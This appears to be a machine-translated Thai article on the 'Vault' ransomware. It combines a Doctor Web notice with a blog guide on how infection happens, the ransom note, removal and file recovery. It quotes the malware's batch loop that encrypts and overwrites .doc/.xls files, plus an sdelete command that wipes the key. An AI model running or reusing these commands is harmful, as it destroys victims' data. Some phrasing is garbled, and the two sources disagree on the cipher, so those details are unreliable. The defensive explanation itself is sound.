ไวรัส Vault วิธีการกู้คืนไฟล์ windows xp วิธีการกู้คืนไฟล์ด้วยตัวคุณเองหลังจากไวรัส Vault Vault Virus - สิ่งที่ต้องทำ

ผู้เชี่ยวชาญด้านการป้องกันไวรัสของ Doctor Web ได้พัฒนาวิธีการถอดรหัสไฟล์ที่ไม่สามารถเข้าถึงได้อันเป็นผลมาจากการกระทำของตัวเข้ารหัสโทรจันที่เป็นอันตราย Trojan.Encoder.2843ผู้ใช้รู้จักในชื่อ "ห้องนิรภัย"

แรนซัมแวร์รุ่นนี้ตั้งชื่อตามประเภท Dr.Web Trojan.Encoder.2843, แพร่กระจายอย่างแข็งขันโดยอาชญากรไซเบอร์โดยใช้รายชื่อส่งเมลจำนวนมาก ไฟล์ขนาดเล็กที่มีสคริปต์ใน JavaScript ถูกใช้เป็นไฟล์แนบไปกับตัวอักษร ไฟล์นี้ดึงมาจากตัวมันเองโดยแอปพลิเคชันซึ่งดำเนินการส่วนที่เหลือที่จำเป็นเพื่อให้แน่ใจว่าการทำงานของตัวเข้ารหัส โทรจันแรนซัมแวร์รุ่นนี้เผยแพร่ตั้งแต่วันที่ 2 พฤศจิกายน 2558

แล้วนี้ละ มัลแวร์ยังค่อนข้างอยากรู้อยากเห็น เข้าสู่ระบบ รีจิสทรีของ windowsไลบรารีไดนามิกที่เข้ารหัส ( .DLL) ถูกเขียนขึ้น และโทรจันจะแทรกโค้ดขนาดเล็กลงในกระบวนการ explorer.exe ที่ทำงานอยู่ ซึ่งจะอ่านไฟล์จากรีจิสตรี้ในหน่วยความจำ ถอดรหัส และโอนการควบคุมไปยังไฟล์นั้น

รายการไฟล์ที่เข้ารหัส Trojan.Encoder.2843ยังเก็บใน การลงทะเบียนระบบและสำหรับแต่ละคนใช้คีย์ที่ไม่ซ้ำกันซึ่งประกอบด้วยอักษรละตินตัวพิมพ์ใหญ่ ไฟล์ได้รับการเข้ารหัสโดยใช้อัลกอริธึม Blowfish-ECB คีย์เซสชันถูกเข้ารหัสโดยใช้ RSA โดยใช้อินเทอร์เฟซ CryptoAPI นามสกุล .vault ถูกกำหนดให้กับไฟล์ที่เข้ารหัสแต่ละไฟล์

ผู้เชี่ยวชาญ Doctor Web ได้พัฒนาเทคนิคพิเศษที่อนุญาตให้ถอดรหัสไฟล์ที่เสียหายจากโทรจันนี้ได้ในหลายกรณี หากคุณตกเป็นเหยื่อของมัลแวร์ Trojan.Encoder.2843ให้ใช้แนวทางต่อไปนี้:

• ติดต่อตำรวจด้วยคำสั่งที่เกี่ยวข้อง
• พยายามติดตั้งใหม่ไม่ว่าในกรณีใดๆ ระบบปฏิบัติการ, "เพิ่มประสิทธิภาพ" หรือ "ล้างข้อมูล" โดยใช้ยูทิลิตี้ใดๆ
• อย่าลบไฟล์ใด ๆ ในคอมพิวเตอร์ของคุณ
• อย่าพยายามกู้คืนไฟล์ที่เข้ารหัสด้วยตัวเอง
• ติดต่อฝ่ายสนับสนุนด้านเทคนิคของ Doctor Web (บริการนี้ฟรีสำหรับผู้ใช้ใบอนุญาต Dr.Web เชิงพาณิชย์);
• แนบไฟล์ใดๆ ที่เข้ารหัสโดยโทรจันเข้ากับตั๋ว
• รอการตอบกลับจากผู้เชี่ยวชาญฝ่ายสนับสนุนด้านเทคนิค เนื่องจากมีคำขอจำนวนมาก จึงอาจใช้เวลาสักครู่

เราขอเตือนคุณว่าบริการถอดรหัสไฟล์มีให้เฉพาะผู้ถือใบอนุญาตเชิงพาณิชย์สำหรับผลิตภัณฑ์ป้องกันไวรัสของ Dr.Web เท่านั้น Doctor Web ไม่รับประกันว่าไฟล์ทั้งหมดที่เสียหายจากตัวเข้ารหัสจะถูกถอดรหัส แต่ผู้เชี่ยวชาญของเราจะพยายามอย่างเต็มที่เพื่อบันทึกข้อมูลที่เข้ารหัส

บทความของเราทุ่มเทให้กับ "ผลงานชิ้นเอก" ของแฮกเกอร์ - ไวรัส Vault ransomware เราจะบอกคุณว่าไวรัส Vault คืออะไรและมีผลกับระบบอย่างไร พิจารณาตัวเลือกที่คุณสามารถกู้คืนไฟล์ได้

Vault Virus - จะทำอย่างไร !

วันหนึ่ง "สวยงาม" คุณเปิดเดสก์ท็อปและเห็นโน้ตบุ๊กที่ทำงานอยู่พร้อมข้อความต่อไปนี้:

จากนี้จะชัดเจน - คุณกลายเป็น "เจ้าของที่โชคร้าย" ของไวรัส Vault ไวรัสนี้ติดคอมพิวเตอร์ของคุณและเริ่มเข้ารหัสไฟล์ของคุณ นี่คือวิธีที่ไฟล์ที่มีนามสกุล .pdf, .doc, .docx, .xls, .xlsx, .jpeg, .zip ฯลฯ อยู่ภายใต้การเข้ารหัส หลังจากไวรัสทำงาน นามสกุล .vault จะถูกเพิ่มลงในชื่อไฟล์ นอกจากนี้ ไวรัสในบางกรณีอาจส่งผลต่อฐานข้อมูล 1C ในเครื่อง อย่างที่คุณเห็น ห้องนิรภัยจะเข้ารหัสเอกสารทั้งหมดที่เป็นที่นิยมสำหรับการทำงาน

คุณอาจสงสัยว่า: ห้องนิรภัยมาที่คอมพิวเตอร์ของฉันได้อย่างไร ทุกอย่างง่ายเหมือนปอกเปลือกลูกแพร์ที่นี่ ผู้โจมตีส่งถึงคุณ อีเมลจดหมาย. ชื่อจดหมายพูดถึงความสำคัญและความจำเป็นเร่งด่วนในการเปิดอ่าน อาจเป็นจดหมายจากธนาคาร หุ้นส่วน หรือข้อเสนอที่ให้ผลกำไร ในจดหมายฉบับนี้มีเอกสารแนบที่มีนามสกุล .js (จาวาสคริปต์)

เมื่อเปิดตัว (และคุณเปิดใช้แล้ว!) ส่วนขยายไวรัสนี้จะดาวน์โหลดโปรแกรมเข้ารหัสจากเซิร์ฟเวอร์ของแฮ็กเกอร์ ในกรณีของคุณ ไวรัส Vault ransomware เป็นซอฟต์แวร์เข้ารหัสที่ถูกต้องตามกฎหมาย GPG (GnuPG)โดยใช้อัลกอริธึมการเข้ารหัส rsa-1024 ที่เป็นที่นิยม โปรแกรมไม่ใช่ไวรัส ดังนั้นโปรแกรมป้องกันไวรัสจะไม่บล็อกและอนุญาตให้ทำงาน GPG สร้างคีย์การเข้ารหัสสาธารณะ (บนพีซีของคุณ) และส่วนตัว (บนเซิร์ฟเวอร์ของผู้โจมตี)

มีการดัดแปลงหลายอย่างของไวรัส Vault ตัวอย่างเช่น สำหรับระบบ Windows 7/8, 32 บิต หรือ 64 บิต และเมื่อเข้าไปในแต่ละไวรัส ไวรัสก็ทำหน้าที่ในแบบของมันเอง นอกจากนี้ ไวรัสยังสามารถเข้ารหัสคอมพิวเตอร์ในเครือข่ายเดียวกันกับของคุณได้

จะลบไวรัส Vault ออกจากคอมพิวเตอร์ได้อย่างไร?

ไวรัสทำหน้าที่ในลักษณะที่ว่าในโฟลเดอร์ที่มีไฟล์ต้นฉบับ ไฟล์ที่คล้ายกับนามสกุล .pg จะถูกสร้างขึ้น จากนั้นไฟล์นี้จะเริ่มทำงาน แทนที่ไฟล์ต้นฉบับและเพิ่มส่วนขยายของห้องนิรภัย โดยการเปลี่ยนชื่ออย่างง่ายเอกสารไม่ได้กำจัดที่นี่ ดังนั้น มาดูวิธีการกู้คืนไฟล์และลบไวรัส vault กัน

กำจัดไวรัสเอง

ทันทีที่คุณพบส่วนขยาย vault ในเอกสารของคุณ ให้ปิดเครือข่ายทันที และหยุดทำงานกับแอปพลิเคชันทั้งหมด อย่าเปิดโฟลเดอร์บนดิสก์อีก เข้าสู่ระบบด้วย โหมดปลอดภัย.

ในแง่ของการกำจัดไวรัส Vault นั้นไม่ยาก การลบออกนั้นไม่ยาก สำหรับสิ่งนี้ ให้ใช้โปรแกรมยอดนิยมเพื่อลบไวรัส scrambler โฆษณาแบนเนอร์ โทรจัน แต่ปัญหาจะดำเนินต่อไป :(

สิ่งที่คุณต้องรู้คือตัวไวรัสเองนั้นถูกซ่อนอยู่ในโฟลเดอร์ Temp ไวรัสประกอบด้วยไฟล์ต่อไปนี้:

• 3c21b8d9.cmd;
• fabac41c.js;
• VAULT.txt;
• Sdc0.bat;
• VAULT.KEY;
• CONFIRMATION.คีย์

ไฟล์ทั้งหมดเหล่านี้ ยกเว้นสองไฟล์สุดท้าย (!) จะต้องถูกลบทิ้งถัดไป เรียกใช้ตัวล้าง ล้างการเริ่มต้น ตรวจสอบข้อผิดพลาดของรีจิสทรี (หลักการจะเหมือนกันสำหรับ Windows 7/8/10) ต้องทิ้งไฟล์ 2 ไฟล์สุดท้ายไว้ในคอมพิวเตอร์เนื่องจาก:

1. VAULT.KEY - คีย์เข้ารหัสเอง ห้ามลบเด็ดขาด! มันถูกส่งไปยังผู้โจมตี วิเคราะห์ พวกเขาจะให้ส่วนที่สองของคีย์ในการถอดรหัสลับ
2. CONFIRMATION.KEY - ไฟล์ด้วย ข้อมูลครบถ้วนเกี่ยวกับจำนวนไฟล์ที่เข้ารหัสบนพีซี ก็ยังจำเป็นสำหรับแฮกเกอร์

กู้คืนไฟล์ที่มีนามสกุล .vault ฟรี

ดังนั้นเราจึงมาถึงสิ่งที่เลวร้ายที่สุด - ไฟล์ยังคงเข้ารหัส ไม่มี decryptors ฟรีสำหรับไวรัส vault ไฟล์ที่มีคีย์ rsa-1024 สามารถถอดรหัสได้โดยโปรแกรมดั้งเดิมเท่านั้น

วิธีการกู้คืนไฟล์มีอะไรบ้าง:

หากคุณไม่พบสิ่งใดในถังรีไซเคิลและไม่มีจุดคืนค่าระบบ คุณจะต้องจ่ายให้กับอาชญากรไซเบอร์ ไม่มีอะไรที่คุณสามารถทำได้เกี่ยวกับเรื่องนี้ การวิเคราะห์บทสนทนาในฟอรัม ข้อสรุปดังต่อไปนี้ - ผู้โจมตีสามารถถอดรหัสไฟล์ได้จริง แต่คุณต้องจ่ายสำหรับสิ่งนี้หากสิ่งนี้ไม่เป็นความจริง คำพูดจากปากต่อปากบนอินเทอร์เน็ตคงแพร่กระจายไปนานแล้ว และผู้คนจะไม่ถูกชักจูงให้ทำเช่นนี้ ควรเข้าใจว่านี่เป็น "ระบบธุรกิจ" ทั้งหมด - คุณถูกจับได้ ตอนนี้คุณจ่ายเงินและทุกอย่างจะเรียบร้อย

มันถึงจุดที่มี super-agent บนอินเทอร์เน็ตอยู่แล้ว! นั่นคือคนกลางที่จะติดต่อผู้โจมตีให้คุณและแก้ปัญหาทั้งหมดของคุณ อยู่ที่ว่าจะทำหรือไม่ทำ ถ้าไม่อยากทำเองก็จ่ายเพิ่ม

ทำตามคำแนะนำจากไฟล์ข้อความ คุณจะเปิดเบราว์เซอร์ Tor (สำหรับการลบ IP โดยเฉพาะ) จากนั้นคุณจะถูกนำไปที่ไซต์ของอาชญากรไซเบอร์ มีคู่มือการทำงานกับเว็บไซต์และแม้แต่ระบบส่วนลด :(

แล้วแอนติไวรัสล่ะ?

น่าเสียดาย ตามที่กล่าวไว้ข้างต้น โปรแกรมแอนตี้ไวรัส Dr Web, Kaspersky, Avast และอื่นๆ ไม่สามารถทำอะไรได้ ท้ายที่สุดแล้วโปรแกรมไม่ใช่ไวรัส คำขออย่างเป็นทางการสำหรับการสนับสนุนทางเทคนิคของ Kaspersky Lab จบลงด้วยเรื่องราวโดยละเอียดเกี่ยวกับห้องนิรภัยและคำแนะนำในการใช้ตัวถอดรหัส RannohDecryptor, ScatterDecryptor, Rector Decryptor, RakhniDecryptor หรือ Xorist Decryptor โดยทั่วไป Doctor Web แนะนำให้ติดต่อตำรวจเกี่ยวกับการเข้าถึงคอมพิวเตอร์โดยไม่ได้รับอนุญาต อืม ขอบคุณหมอ

อย่างที่คุณเห็น มีตัวเลือกไม่มากนัก และหากไฟล์มีความสำคัญต่อคุณมาก คุณจะต้องจ่ายเงิน นอกจากนี้ยังเป็นไปไม่ได้ที่จะดึงสิ่งนี้ เซิร์ฟเวอร์ที่มีฐานข้อมูลและไซต์กำลังเคลื่อนที่อยู่ตลอดเวลา - เซิร์ฟเวอร์เก่าจะถูกลบออกและปรากฏขึ้นใหม่

และนี่คือวิดีโอสั้น ๆ ที่คุณสามารถดูว่าไวรัส Vault ทำงานอย่างไรในระบบ วิดีโอนี้ไม่ใช่โฆษณา :)

1. เป็นไปได้มากที่คุณจะประสบปัญหาเช่นการเข้ารหัสไฟล์ของคุณและความปรารถนาโดยที่คุณไม่รู้ตัว โดยการเปิดลิงก์ในจดหมายที่ส่งถึงคุณทางไปรษณีย์และน่าจะมาจากผู้ส่งที่ยืนยันตัวตนซึ่งคุณได้ติดต่อไปแล้ว แต่อาจจะเป็นโฆษณาก็ได้! แต่ความจริงอยู่บนใบหน้าของคุณและคุณมีอาการดังต่อไปนี้ซึ่งแสดงออกดังนี้:

ทันใดนั้น ไฟล์ข้อความเปิดขึ้นในแผ่นจดบันทึกโดยมีเนื้อหาดังต่อไปนี้:

1. เอกสารการทำงานและฐานข้อมูลของคุณถูกล็อคและทำเครื่องหมายด้วยรูปแบบ .vаult
2. หากต้องการกู้คืน คุณจะต้องรับรหัสเฉพาะ
3. ขั้นตอนการรับกุญแจ:
4. สั้นๆ
5. 1. ไปที่ทรัพยากรบนเว็บของเรา
6. 2. รับคีย์ของคุณรับประกัน
7. 3. กู้คืนไฟล์เป็นฟอร์มก่อนหน้า
8. รายละเอียด
9. ขั้นตอนที่ 1:
10. ดาวน์โหลดเบราว์เซอร์ Tor จากเว็บไซต์ทางการ:
https://www.torproject.org
11. ขั้นตอนที่ 2:
12. ใช้เบราว์เซอร์ Tor เยี่ยมชมเว็บไซต์:
https://restoredz4xpmuqr.onion
13. ขั้นตอนที่ 3:
14. ค้นหา VAULT.KEY ที่ไม่เหมือนใครบนคอมพิวเตอร์ของคุณ นี่คือกุญแจสู่แผงไคลเอนต์ส่วนบุคคลของคุณ อย่าลบนะ
15. ลงชื่อเข้าใช้ไซต์โดยใช้ VAULT.KEY
16. ไปที่ส่วนคำถามที่พบบ่อยและอ่านขั้นตอนเพิ่มเติม
17. ขั้นตอนที่ 4:
18. หลังจากได้รับคีย์แล้ว คุณสามารถกู้คืนไฟล์ได้โดยใช้ซอฟต์แวร์โอเพ่นซอร์สของเรา รหัสแหล่งที่มาหรือการใช้ซอฟต์แวร์ของคุณปลอดภัย
19. นอกจากนี้
20. ก) คุณจะไม่สามารถกู้คืนไฟล์ได้หากไม่มีคีย์เฉพาะ (ซึ่งเก็บไว้อย่างปลอดภัยบนเซิร์ฟเวอร์ของเรา)
21. b) หากคุณไม่พบ VAULT.KEY ของคุณ ให้ดูในโฟลเดอร์ชั่วคราว TEMP
22. c) ค่าใช้จ่ายในการฟื้นฟูของคุณยังไม่สิ้นสุด เขียนไปที่แชท
23. ล็อควันที่: 04/08/2015 (11:14)
2. ขึ้นอยู่กับดุลยพินิจของคุณ คุณสามารถทำตามที่บอกในไฟล์ได้ (แต่ฉันจะไม่ทำ) ทำไม? เนื่องจากมันไม่น่าเชื่อถือ การจ่ายเงินให้พวกกรรโชกคือการรักษาและพัฒนาความแข็งแกร่งของพวกเขา จากนั้น vryatli คุณจะได้รับคีย์ถอดรหัส
3. การปรากฏตัวของข้อความดังกล่าวหมายความว่าไวรัสห้องนิรภัยได้ติดคอมพิวเตอร์ของคุณและเริ่มเข้ารหัสไฟล์ ณ จุดนี้ คุณต้องปิดเครื่องคอมพิวเตอร์ทันที ยกเลิกการเชื่อมต่อจากเครือข่ายและลบทั้งหมด สื่อที่ถอดออกได้... เราจะพูดถึงวิธีการรักษาไวรัสในภายหลัง แต่ตอนนี้ ฉันจะบอกคุณว่าเกิดอะไรขึ้นในระบบของคุณ
4. เป็นไปได้มากว่าคุณได้รับจดหมายทางไปรษณีย์จากคู่สัญญาที่เชื่อถือได้หรือปลอมตัวเป็น องค์กรที่มีชื่อเสียง... นี่อาจเป็นคำขอเพื่อดำเนินการกระทบยอดทางบัญชีในช่วงเวลาหนึ่ง คำขอเพื่อยืนยันการชำระเงินของใบแจ้งหนี้ภายใต้ข้อตกลง ข้อเสนอเพื่อทำความคุ้นเคยกับหนี้เงินกู้ที่ Sberbank หรืออย่างอื่น แต่ข้อมูลจะเป็นเช่นว่าคุณจะสนใจอย่างแน่นอนและคุณจะเปิดไฟล์แนบอีเมลที่มีไวรัส นี่คือสิ่งที่นับ
5. ดังนั้น คุณเปิดไฟล์แนบที่มีนามสกุล .js และเป็นจาวาสคริปต์ ตามทฤษฎีแล้ว สิ่งนี้ควรเตือนคุณและห้ามไม่ให้คุณเปิดอ่าน แต่ถ้าคุณกำลังอ่านบรรทัดเหล่านี้ แสดงว่าไม่ได้เตือนคุณและไม่ได้หยุดคุณ สคริปต์ดาวน์โหลดโทรจันหรือห้องนิรภัยแบนเนอร์จากเซิร์ฟเวอร์ของผู้โจมตีตามที่สามารถเรียกได้ในกรณีนี้และโปรแกรมเข้ารหัส ใส่ทั้งหมดลงในไดเร็กทอรีชั่วคราวของผู้ใช้ และกระบวนการเข้ารหัสไฟล์จะเริ่มขึ้นทันทีในทุกที่ที่ผู้ใช้สามารถเข้าถึงได้ - ไดรฟ์เครือข่าย, แฟลชไดรฟ์, ฮาร์ดไดรฟ์ภายนอก ฯลฯ
6. vault ransomware เป็นยูทิลิตี้เข้ารหัส gpg ฟรีและอัลกอริธึมการเข้ารหัสยอดนิยม - RSA-1024 โดยพื้นฐานแล้วยูทิลิตี้นี้ถูกใช้เป็นจำนวนมากโดยที่มันไม่ใช่ไวรัสในตัวเอง แอนตี้ไวรัสปล่อยให้มันผ่านไปและไม่ปิดกั้นการทำงานของมัน เปิดและ กุญแจส่วนตัวเพื่อเข้ารหัสไฟล์ คีย์ส่วนตัวยังคงอยู่บนเซิร์ฟเวอร์ของแฮ็กเกอร์และเป็นสาธารณะในคอมพิวเตอร์ของผู้ใช้
7. จะใช้เวลาสักครู่หลังจากเริ่มกระบวนการเข้ารหัส ขึ้นอยู่กับปัจจัยหลายประการ - ความเร็วในการเข้าถึงไฟล์ ประสิทธิภาพของคอมพิวเตอร์ จากนั้นข้อความแสดงข้อมูลจะปรากฏขึ้นใน ไฟล์ข้อความ, เนื้อหาที่ฉันให้ในตอนต้น ณ จุดนี้ ข้อมูลบางส่วนได้รับการเข้ารหัสแล้ว
8. โดยเฉพาะอย่างยิ่ง ฉันพบการดัดแปลงของไวรัส vault ที่ทำงานบนระบบ 32 บิตเท่านั้น นอกจากนี้ ใน Windows 7 ที่เปิดใช้งาน UAC การแจ้งเตือนให้ป้อนรหัสผ่านผู้ดูแลระบบจะปรากฏขึ้น ไวรัสไม่สามารถทำอะไรได้โดยไม่ใส่รหัสผ่าน ใน Windows XP จะเริ่มทำงานทันทีหลังจากเปิดไฟล์จากเมล โดยไม่ถามคำถามใดๆ

ไวรัสทำให้ส่วนขยาย vault ใน doc, jpg, xls และไฟล์อื่น ๆ

9. ไวรัสทำอะไรกับไฟล์กันแน่? เมื่อมองแวบแรก ดูเหมือนว่าเพิ่งเปลี่ยนส่วนขยายจากมาตรฐานเป็น .vault เมื่อครั้งแรกที่ฉันเห็นการทำงานของไวรัสแรนซัมแวร์นี้ ฉันคิดว่ามันเป็นสัญญาณรบกวนของเด็ก ฉันเปลี่ยนชื่อไฟล์กลับและรู้สึกประหลาดใจมากเมื่อมันไม่เปิดตามที่คาดไว้ และแทนที่จะเป็นเนื้อหาที่ตั้งใจไว้ อักขระที่เข้าใจยากกลับเปิดขึ้น จากนั้นฉันก็รู้ว่าทุกอย่างไม่ง่าย ฉันเริ่มเข้าใจและค้นหาข้อมูล
10. ไวรัสสแกนไฟล์ยอดนิยมทุกประเภท - doc, docx, xls, xlsx, jpeg, pdf และอื่น ๆ เพิ่มนามสกุล .vault ใหม่ในชื่อไฟล์มาตรฐานแล้ว สำหรับบางคน มันยังเข้ารหัสไฟล์ด้วยฐานข้อมูล 1C ในเครื่อง ฉันไม่มีสิ่งนี้ดังนั้นฉันจึงไม่ได้สังเกตสิ่งนี้เป็นการส่วนตัว เพียงแค่เปลี่ยนชื่อไฟล์กลับตามที่คุณเข้าใจ ไม่ได้ช่วยอะไรที่นี่
11. เนื่องจากกระบวนการเข้ารหัสไม่ได้เกิดขึ้นในทันที จึงอาจเกิดขึ้นได้ว่าเมื่อคุณพบว่าคุณมีไวรัสในคอมพิวเตอร์ ไฟล์บางไฟล์จะยังคงเป็นปกติ และบางไฟล์อาจติดไวรัส เป็นการดีถ้าส่วนใหญ่ยังไม่ถูกแตะต้อง แต่บ่อยครั้งที่ไม่มีใครวางใจได้
12. ฉันจะบอกคุณถึงสิ่งที่ซ่อนอยู่เบื้องหลังการเปลี่ยนแปลงส่วนขยาย หลังจากเข้ารหัส เช่น file.doc ข้างๆ ไวรัส vault จะสร้างไฟล์ที่เข้ารหัส file.doc.gpg จากนั้น file.doc.gpg ที่เข้ารหัสจะถูกย้ายไปยังตำแหน่งเดิมด้วยชื่อใหม่ file.doc และ หลังจากนั้นจะเปลี่ยนชื่อเป็นไฟล์ doc.vault ปรากฎว่าไฟล์ต้นฉบับไม่ได้ถูกลบ แต่ถูกเขียนทับโดยเอกสารที่เข้ารหัส หลังจากนั้นจะไม่สามารถกู้คืนได้โดยใช้เครื่องมือการกู้คืนมาตรฐาน ไฟล์ที่ถูกลบ... นี่คือโค้ดบางส่วนที่ใช้ฟังก์ชันนี้:

dir / B "% 1:" && สำหรับ / r "% 1:" %% i ใน (* .xls * .doc) ทำ (echo "%% TeMp %% \ svchost.exe" -r Cellar --yes - q --no-verbose --trust-model เสมอ --encrypt-files "%% i" ^ & ย้าย / y "%% i.gpg" "%% i" ^ & เปลี่ยนชื่อ "%% i" "%% ~ nxi.vault ">>"% temp% \ cryptlist.lst "echo %% i >>"% temp% \ conf.list ")

วิธีลบไวรัส vault และรักษาคอมพิวเตอร์ของคุณ

13. หลังจากตรวจพบไวรัสแรนซัมแวร์แล้ว ขั้นตอนแรกคือ กำจัดไวรัสโดยรักษาคอมพิวเตอร์ของคุณ เป็นการดีที่สุดที่จะบูตจากบางส่วน ดิสก์สำหรับบูตและทำความสะอาดระบบด้วยตนเอง Virus vault ในแง่ของการกัดกร่อนต่อระบบ ไม่ใช่เรื่องยาก ง่ายต่อการทำความสะอาดด้วยตัวเอง ฉันจะไม่พูดถึงประเด็นนี้โดยละเอียด เนื่องจากคำแนะนำมาตรฐานสำหรับการลบไวรัส ransomware แบนเนอร์และโทรจันมีความเหมาะสมที่นี่
14. ตัวไวรัสเองนั้นอยู่ในโฟลเดอร์ temp ของผู้ใช้ที่เปิดใช้งาน ไวรัสประกอบด้วยไฟล์ต่อไปนี้ ชื่ออาจมีการเปลี่ยนแปลง แต่โครงสร้างจะเหมือนกัน:

• 3c21b8d9.cmd
• 04fba9ba_VAULT.KEY
• CONFIRMATION.KEY
• fabac41c.js
• Sdc0.bat
• VAULT.KEY
• VAULT.txt

VAULT.KEY - คีย์การเข้ารหัส หากคุณต้องการถอดรหัสข้อมูล อย่าลืมบันทึกไฟล์นี้ มันถูกส่งต่อไปยังผู้โจมตีและโดยพื้นฐานแล้วพวกเขาจะให้คู่คีย์ที่สองแก่คุณพร้อมความช่วยเหลือในการถอดรหัสที่จะเกิดขึ้น หากไฟล์นี้สูญหาย ข้อมูลจะไม่สามารถกู้คืนได้แม้จะเป็นเงินก็ตาม

CONFIRMATION.KEY - มีข้อมูลเกี่ยวกับไฟล์ที่เข้ารหัส อาชญากรจะขอให้เขาคำนวณจำนวนเงินที่จะเอาไปจากคุณ

ไฟล์ที่เหลือเป็นไฟล์บริการ ลบได้ หลังจากถอนการติดตั้ง คุณจะต้องล้างการเริ่มต้นระบบเพื่อไม่ให้มีลิงก์ไปยังไฟล์ที่ถูกลบและไม่มีข้อผิดพลาดในการเริ่มต้น ตอนนี้คุณสามารถเริ่มต้นคอมพิวเตอร์และประเมินขนาดของโศกนาฏกรรมได้

วิธีการกู้คืนและถอดรหัสไฟล์หลังจาก vault virus

เราจึงมาถึงจุดที่สำคัญที่สุด เราจะกู้คืนข้อมูลของเราได้อย่างไร เรารักษาคอมพิวเตอร์ สิ่งที่เราสามารถกู้คืนได้ด้วยการทำลายการเข้ารหัส ตอนนี้เราต้องพยายามถอดรหัสไฟล์ แน่นอน สิ่งที่ง่ายที่สุดและเป็นที่ต้องการมากที่สุดคือการได้ตัวถอดรหัสสำเร็จรูปสำหรับการถอดรหัส แต่ไม่มีอยู่จริง อนิจจา เป็นไปไม่ได้ในทางเทคนิคที่จะสร้างเครื่องมือเพื่อถอดรหัสข้อมูลที่เข้ารหัสด้วยคีย์ RSA-1024 / น่าเสียดายที่มีตัวเลือกไม่มากนักที่นี่:

คุณโชคดีมากถ้าคุณเปิดใช้งานการป้องกันระบบ รวมอยู่ในดิสก์แต่ละแผ่นแยกกัน หากเสร็จแล้ว คุณสามารถใช้เครื่องมือการกู้คืน เวอร์ชันก่อนหน้าไฟล์และโฟลเดอร์ มันอยู่ในคุณสมบัติของไฟล์ รายละเอียดเพิ่มเติมสามารถพบได้บนอินเทอร์เน็ต มีบทความเพียงพอเกี่ยวกับเครื่องมือการกู้คืนนี้

หากคุณมีไฟล์ที่เข้ารหัสใน ไดรฟ์เครือข่ายค้นหาสำเนาสำรอง ตรวจสอบว่ามีการเปิดใช้งานถังรีไซเคิลบนดิสก์เหล่านี้หรือไม่ ไฟล์ต้นฉบับของคุณจะอยู่ที่นั่น แม้ว่าจะไม่ได้มาตรฐานในไดรฟ์เครือข่าย แต่ก็สามารถกำหนดค่าแยกต่างหากได้ ฉันทำสิ่งนี้บ่อยที่สุดเมื่อตั้งค่าลูกบอลเครือข่าย จำไว้ว่าถ้าคุณมีข้อมูลสำรองในเครื่องของคุณ

หากคุณมีข้อมูลเสียหายในโฟลเดอร์ที่เชื่อมต่อกับที่เก็บข้อมูลบนอินเทอร์เน็ตเช่น Yandex. ดิสก์, Dropbox, ดิสก์ Google, ดูในถังขยะ, ควรมีไฟล์ต้นฉบับเหลืออยู่ก่อนการเข้ารหัส

ลองหาไฟล์ secring.gpgต้องสร้างไฟล์นี้ในเครื่องของคุณ (โดยปกติคือ % TEMP% ของผู้ใช้) ในขณะที่เริ่มกระบวนการเข้ารหัส น่าเสียดายที่ความน่าจะเป็นของการค้นหา secring.gpg ที่ประสบความสำเร็จนั้นต่ำ เนื่องจากตัวเข้ารหัสจะเขียนทับคีย์นี้อย่างระมัดระวังโดยใช้ยูทิลิตี้ sdelete.exe:

"% temp% \ sdelete.exe" / accepteula -p 4 -q "% temp% \ secring.gpg"

การรีสตาร์ทตัวเข้ารหัสเพื่อรับคีย์นี้จะไม่ช่วย คีย์จะถูกสร้างขึ้นด้วยลายนิ้วมือและ ID อื่น และจะไม่เหมาะสำหรับการถอดรหัสเอกสารของคุณ ลองค้นหาคีย์นี้ในไฟล์ที่ถูกลบ แต่ให้แน่ใจว่ามีขนาดไม่เป็นศูนย์อยู่ที่ ~ 1Kb

หากวิธีการข้างต้นไม่ได้ช่วยคุณ และข้อมูลมีความสำคัญมาก คุณมีทางเลือกเดียวเท่านั้น - จ่ายเงินให้กับผู้สร้างไวรัส แต่อย่างที่ฉันเขียนไว้ข้างต้น ส่วนตัวฉันจะไม่ทำ ไวรัสห้องนิรภัยเป็นที่นิยมมากจนมีโฆษณาปรากฏบนเครือข่าย ซึ่งสหายบางคนเสนอให้ต่อรองกับแฮกเกอร์เพื่อเงินเพื่อลดราคาของการถอดรหัสข้อมูล ฉันไม่รู้ว่าพวกเขาลดราคาได้จริงแค่ไหนและไม่ว่าพวกเขาจะลดราคาหรือไม่ บางทีพวกเขาเป็นเพียงการติดสินบนที่จะเอาเงินจากคุณไปและล้างออก เป็นไปได้มากว่าจะเป็นเช่นนั้น โดยทั่วไปแล้วจะกลายเป็นความผิดทางอาญาที่บริสุทธิ์ แม้แต่รัฐบาลก็ไม่จ่ายให้กับผู้ก่อการร้าย แต่ในค่าครองชีพ คุณตัดสินใจ. เขียนถ้ามีอะไรเกิดขึ้น

Kaspersky, drweb และแอนตี้ไวรัสอื่นๆ ในการต่อสู้กับ vault ransomware

แต่แอนตี้ไวรัสสามารถเสนออะไรให้เราในการต่อสู้กับหายนะที่เข้ารหัสนี้ได้บ้าง โดยส่วนตัวแล้ว ฉันพบเห็นการติดไวรัสในคอมพิวเตอร์ที่ติดตั้ง Kaspersky เวอร์ชันลิขสิทธิ์ที่ได้รับใบอนุญาตและอัปเดตอย่างสมบูรณ์ เขาไม่ตอบสนองต่อการเปิดตัวแรนซัมแวร์แต่อย่างใด เมื่อต้นเดือนพฤษภาคม 2558 อาจมีบางอย่างเปลี่ยนไปแล้ว แต่ในขณะที่ฉันค้นหาข้อมูลเกี่ยวกับปัญหานี้ ไม่มีไวรัสใดรับประกันได้ว่าผู้ใช้จะได้รับการปกป้องจากภัยคุกคามดังกล่าว ฉันอ่านฟอรัมของแอนตี้ไวรัสยอดนิยม - Kaspersky, DrWeb และอื่นๆ ทุกที่ยักไหล่ หากคุณได้รับการเสนอให้ดาวน์โหลดยูทิลิตี้อื่นที่คุณไม่ทราบว่าต้องถอดรหัสไฟล์อะไร อย่าทำเช่นนี้ เป็นไปได้มากว่าคุณจะได้รับไวรัสอื่น

วิธีการป้องกันไวรัสในห้องนิรภัย

ไม่มีวิธีการป้องกันใดโดยเฉพาะสำหรับไวรัสนี้ มีเพียงวิธีที่ยอมรับกันโดยทั่วไปสำหรับไวรัสทั้งหมด

